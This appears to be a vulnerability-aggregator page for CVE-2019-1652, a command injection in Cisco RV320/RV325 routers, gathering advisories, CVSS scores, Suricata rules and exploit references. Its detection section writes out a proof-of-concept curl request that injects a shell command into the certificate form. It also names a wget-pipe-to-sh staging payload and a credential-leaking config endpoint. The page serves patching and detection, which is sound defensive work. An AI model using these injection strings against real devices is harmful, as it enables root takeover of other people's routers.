CVE-2019-1652
published 2019-01-24CVE-2019-1652: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote…
PriorityP188high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-03-17
Exploited in the wild
EPSS
95.92%
99.9th percentile
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_small_business_rv_series_router_firmware | — | — |
| cisco | rv320_firmware | >= 1.4.2.15 < 1.4.2.22 | 1.4.2.22 |
| cisco | rv325_firmware | >= 1.4.2.15 < 1.4.2.22 | 1.4.2.22 |
| cisco | small_business_rv320_and_rv325_routers | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandopenssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1↗
commandcurl -s -b "$COOKIE" --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30" "&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A" "&organization=A&organization_unit=A&email=ab%40example.com" "&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&" "SelectSubject_s=1" --data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" "http://192.168.1.1/certificate_handle2.htm?type=4"↗
- →Detect exploitation attempts by monitoring HTTP POST requests to /certificate_handle2.htm with shell metacharacters (e.g., $(), ', backtick) in the common_name POST parameter, combined with query parameter type=4. ↗
- →Monitor for unauthenticated GET requests to /cgi-bin/config.exp on Cisco RV320/RV325 devices; a 200 response containing 'PASSWD' indicates the device is vulnerable and credentials may be leaking. ↗
- →Detect staging payload delivery pattern: POST to /certificate_handle2.htm with common_name containing a wget-pipe-to-sh command pattern ('$(wget -q -O- <url>|sh)') indicating command injection exploitation. ↗
- →Flag inbound scans probing for Cisco RV320/RV325 devices on TCP ports 443 and 8007 with requests to /cgi-bin/config.exp, as this is the reconnaissance step chained with CVE-2019-1652 exploitation. ↗
- ·The initial Cisco patch (1.4.2.20) for CVE-2019-1652 was confirmed incomplete; firmware 1.4.2.22 is required for a complete fix. ↗
- ·The web interface performs JavaScript-side filtering of special characters but applies no server-side input filtering, escaping, or encoding, making client-side controls trivially bypassable. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck7.2HIGH
cisa7.2HIGH
vendor_cisco7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-73jm-6x85-hwg5: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticate
ghsa_unreviewed·2022-05-13
CVE-2019-1652 [HIGH] CWE-20 GHSA-73jm-6x85-hwg5: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticate
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
VulnCheck
Cisco Small Business Routers Improper Input Validation Vulnerability
vulncheck·2019·CVSS 7.2
CVE-2019-1652 [HIGH] CWE-20 Cisco Small Business Routers Improper Input Validation Vulnerability
Cisco Small Business Routers Improper Input Validation Vulnerability
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.
Affected: Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.mandiant.com/resources/blog/apt41-initiates-global-intrusion-campaign-using-multiple-exploits; https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer; https://www.bleepingcomputer.com/news/security/us-charges-chinese-winnti-hackers-for-attac
CISA
Cisco Small Business Routers Improper Input Validation Vulnerability
cisa·2022-03-03·CVSS 7.2
CVE-2019-1652 [HIGH] CWE-20 Cisco Small Business Routers Improper Input Validation Vulnerability
Vulnerability: Cisco Small Business Routers Improper Input Validation Vulnerability
Affected: Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-1652
Remediation Due Date: 2022-03-17
Cisco
Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
vendor_cisco·2019-01-23·CVSS 7.2
CVE-2019-1652 [HIGH] CWE-20 Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.
The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root.
Update, April 4, 2019: The initial fix for this
vulnerability was found to be incomplete. The complete fix is now
available in Firmware
Cisco
Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
vendor_cisco·CVSS 3.0
CVE-2019-1652 Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
CVE-2019-1652: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root . Update, April 4, 2019: The initial fix for this vulnerability was found to be incomplete. The complete fix is now availab
Suricata
ET EXPLOIT Cisco RV320/RV325 Command Injection Attempt Inbound (CVE-2019-1652)
suricata·2021-06-04·CVSS 7.2
CVE-2019-1652 [HIGH] ET EXPLOIT Cisco RV320/RV325 Command Injection Attempt Inbound (CVE-2019-1652)
ET EXPLOIT Cisco RV320/RV325 Command Injection Attempt Inbound (CVE-2019-1652)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Cisco RV320/RV325 Command Injection Attempt Inbound (CVE-2019-1652)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"certificate_handle2.htm?type=4"; fast_pattern; http.request_body; content:"|22|common_name|22 3a|"; nocase; content:"|27 24 28|"; distance:0; reference:url,github.com/0x27/CiscoRV320Dump; reference:cve,2019-1652; classtype:attempted-admin; sid:2033088; rev:1; metadata:attack_target Networking_Equipment, created_at 2021_06_04, cve CVE_2019_1652, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_06_04, mitre_tactic_id TA0008, mitre_tactic_name
Suricata
ET EXPLOIT Possible Cisco RV320 RCE Attempt (CVE-2019-1652)
suricata·2019-01-29·CVSS 7.2
CVE-2019-1652 [HIGH] ET EXPLOIT Possible Cisco RV320 RCE Attempt (CVE-2019-1652)
ET EXPLOIT Possible Cisco RV320 RCE Attempt (CVE-2019-1652)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Possible Cisco RV320 RCE Attempt (CVE-2019-1652)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/certificate_handle2.htm?type="; http.request_body; content:"page=self_generator.htm&totalRules="; startswith; fast_pattern; content:"|25 32 37 25 32 34 25 32 38|"; distance:0; reference:url,seclists.org/fulldisclosure/2019/Jan/54; classtype:trojan-activity; sid:2026860; rev:3; metadata:attack_target Networking_Equipment, created_at 2019_01_29, cve CVE_2019_1652, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
Exploit-DB
Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)
exploitdb·2019-04-03·CVSS 7.2
CVE-2019-1653 [HIGH] Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)
Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "Cisco RV320 and RV325 Unauthenticated Remote Code Execution",
'Description' => %q{
This exploit module combines an information disclosure (CVE-2019-1653)
and a command injection vulnerability (CVE-2019-1652) together to gain
unauthenticated remote code execution on Cisco RV320 and RV325 small business
routers. Can be exploited via the WAN interface of the router. Either via HTTPS
on port 443 or HTTP on port 8007 on some older firmware versions.
},
'License' => MSF_LICENSE,
'Author' => [
'RedTeam Pentesting GmbH', # Discovery, Metasploit
'Philip Huppe
Exploit-DB
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
exploitdb·2019-01-25·CVSS 7.2
CVE-2019-1652 [HIGH] Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
---
RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router.
Details
Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 and later
Fixed Versions: since 1.4.2.20
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652
Introduction
"Keep your employees, y
Metasploit
Cisco RV320 and RV325 Unauthenticated Remote Code Execution
metasploit·CVSS 7.2
CVE-2019-1653 [HIGH] Cisco RV320 and RV325 Unauthenticated Remote Code Execution
Cisco RV320 and RV325 Unauthenticated Remote Code Execution
This exploit module combines an information disclosure (CVE-2019-1653) and a command injection vulnerability (CVE-2019-1652) together to gain unauthenticated remote code execution on Cisco RV320 and RV325 small business routers. Can be exploited via the WAN interface of the router. Either via HTTPS on port 443 or HTTP on port 8007 on some older firmware versions.
Tenable
Cisco Fixes Incomplete Patch for RV320 and RV325 Routers, Including Two New Bugs (CVE-2019-1827, CVE-2019-1828)
blogs_tenable·2019-04-04·CVSS 6.1
[MEDIUM] Cisco Fixes Incomplete Patch for RV320 and RV325 Routers, Including Two New Bugs (CVE-2019-1827, CVE-2019-1828)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Cisco Fixes Incomplete Patch for RV320 and RV325 Routers, Including Two New Bugs (CVE-2019-1827, CVE-2019-1828)
blogs_tenable·2019-04-04·CVSS 7.2
CVE-2019-1827 [HIGH] Cisco Fixes Incomplete Patch for RV320 and RV325 Routers, Including Two New Bugs (CVE-2019-1827, CVE-2019-1828)
Blog / Cyber Exposure Alerts
Subscribe
# Cisco Fixes Incomplete Patch for RV320 and RV325 Routers, Including Two New Bugs (CVE-2019-1827, CVE-2019-1828)
Satnam Narang
April 4, 2019
3 Min Read
Cisco finalizes patch for RV320 and RV325 after researchers determined a previous patch was incomplete.
### Background
On April 4, Cisco published updated advisories to address two vulnerabilities in its RV320 and RV325 routers that were originally reported in January 2019. Additionally, Cisco published advisories for two newly discovered, medium severity bugs in the same routers.
### Analysis
Tenable blogged about these vulnerabilities -- CVE-2019-1652 and CVE-2019-1653 -- in late January when public exploit scripts were published. Shortly after publication, reports about exploit attempts ag
Tenable
Public Exploit Scripts for Vulnerable Cisco Small Business RV320 and RV325 Devices Now Available
blogs_tenable·2019-01-25·CVSS 7.2
[HIGH] Public Exploit Scripts for Vulnerable Cisco Small Business RV320 and RV325 Devices Now Available
Blog / Cyber Exposure Alerts
Subscribe
# Public Exploit Scripts for Vulnerable Cisco Small Business RV320 and RV325 Devices Now Available
Satnam Narang
January 25, 2019
3 Min Read
Availability of public exploit scripts for two vulnerabilities in Cisco Small Business WAN VPN routers coupled with incoming scans for vulnerable devices indicate that attackers are preparing to launch attacks.
### Background
On January 23, Cisco published a list of security advisories including advisories for two vulnerabilities in Cisco Small Business RV320 and RV325 dual gigabit WAN VPN routers. Both vulnerabilities exist within the routers’ web-based management interface. The first is CVE-2019-1652, a command injection vulnerability that exists in firmware versions 1.4.2.15 through 1.4.2.19. The second
Tenable
Public Exploit Scripts for Vulnerable Cisco Small Business RV320 and RV325 Devices Now Available
blogs_tenable·2019-01-25
Public Exploit Scripts for Vulnerable Cisco Small Business RV320 and RV325 Devices Now Available
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
NoiseLetter August 2024
blogs_greynoiseio
NoiseLetter August 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.htmlhttp://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2019/Mar/61http://www.securityfocus.com/bid/106728https://seclists.org/bugtraq/2019/Mar/55https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-injecthttps://www.exploit-db.com/exploits/46243/https://www.exploit-db.com/exploits/46655/http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.htmlhttp://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2019/Mar/61http://www.securityfocus.com/bid/106728https://seclists.org/bugtraq/2019/Mar/55https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-injecthttps://www.exploit-db.com/exploits/46243/https://www.exploit-db.com/exploits/46655/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-1652
2019-01-24
Published
2022-03-03
Added to CISA KEV
Exploited in the wild